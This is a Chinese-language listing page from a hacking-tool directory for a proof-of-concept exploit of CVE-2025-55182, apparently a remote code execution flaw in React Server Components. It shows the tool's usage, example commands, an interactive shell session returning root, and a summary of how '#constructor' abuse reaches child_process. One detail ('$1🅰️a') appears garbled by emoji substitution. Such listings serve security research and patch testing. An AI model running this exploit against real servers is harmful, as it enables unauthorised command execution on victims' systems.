Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-PoC — CVE-2025-55182 的 PoC | Kitploit
工具/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

CVE-2025-55182 的 PoC

查看仓库
19个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182-PoC

CVE-2025-55182 的 PoC

root@kitploit:~
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"

法律免责声明

本工具仅用于教育目的和授权安全测试。未经双方事先同意,使用本工具攻击目标属于违法行为。开发者不承担任何责任,亦不对因使用本程序造成的任何滥用或损害负责。

环境要求

pip install requests

使用方法

你可以通过三种模式运行该工具:Check(检测)、Exploit(利用)或 Interactive Shell(交互式 Shell)。

root@kitploit:~
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

options:
  -h, --help         show this help message and exit
  -u URL             Target URL (e.g., http://localhost:3000)
  --id ID            Target Server Action ID (default: user-profile-action)
  -c CMD, --cmd CMD  Command to execute directly (non-interactive mode)
  --check            Only check for vulnerability (Crash Method), do not exploit

示例

root@kitploit:~
python3 poc.py -u http://target-site.com --check

单条命令执行

root@kitploit:~
python3 poc.py -u http://target-site.com --cmd "id"

交互式 Shell 模式

root@kitploit:~
python3 poc.py

# Inside the shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root

工作原理

Check 模式:发送一个 multipart 请求,在索引 1 处定义 {},并尝试访问 ["$1🅰️a"]。未修补的服务器在尝试访问 undefined 的属性 a 时会崩溃(HTTP 500)。已修补的服务器返回 HTTP 200。

Exploit 模式:发送一个引用有效 Action ID 的 multipart 请求,但附加 #constructor。这会诱使序列化器返回 Function 构造函数,从而允许我们传入任意 JavaScript(Node.js child_process)在服务器上执行。

下载工具